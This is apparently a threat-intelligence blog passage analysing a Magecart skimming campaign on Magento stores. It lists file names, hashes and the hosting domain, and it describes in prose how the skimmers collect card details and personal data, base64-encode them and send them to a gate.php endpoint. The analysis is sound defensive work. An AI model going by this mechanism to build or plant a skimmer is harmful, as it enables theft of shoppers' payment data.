Analysis of a recent Magecart campaign

On March 13, SanSec revealed a new Magecart domain used to host malicious JavaScript (.js) files designed to capture credit card details from e-commerce checkout pages. The domain (jquerycdn[.]at) hosted these scripts across at least 299 different victim stores. The Magento 1 e-commerce platform was the most frequently targeted, and it’s important to note that support for Magento 1 ended on June 30, 2020, meaning it no longer receives security updates.
How does the web skimmer work?

“Web skimmers are loaded on the checkout page of a typical store. It lives in the browser of an unsuspecting online customer. Whenever he or she enters her payment information, the private data is siphoned off to an offshore server. Usually, this data is then sold on the dark web within 2-10 weeks.” – SanSec.

In this blog, I analysed the JavaScript Skimmers connected to jquerycdn[.]at in an ongoing campaign:

knockout-fast-foreach.js

46fa357596e58272e6e2865c8b80bb96eb910c577267ce64bcada714c8eefdff

jquery.storageapi.min.js

20ef8044ce87142087cc996cf38c9476df5a95211a9aa03982bd2f17b789de62

Search for the presence of the jquery.storageapi.min.js Skimmer on sites via URLscan here.

jquery.bah-hashchange.min.js

082aa05bdc4869e4c7d40046c0a3ce7861fbfa89356ff714f1514a8e6775e460

Search for the presence of the jquery.bah-hashchange.min.js Skimmer on sites via URLscan here.

These JavaScript Skimmers use the function ‘GetCCInfo’ to collect the online shopper’s credit card number, CVV number, card holder first and last name, smd the expiration date. The ‘SaveParam’ function collects the firstname, lastname, home address, and telephone number. All the data is then encoded with base64 and exfiltrated to jquerycdn[.]at/gate.php.

Although this campaign was detected back in March 2020, the site remains online and is hosted with AS47510 [Crex Fex Pex ISS, RU]. Additionally it appears the JS Skimmer continues to be injected onto ecommerce site’s checkout pages: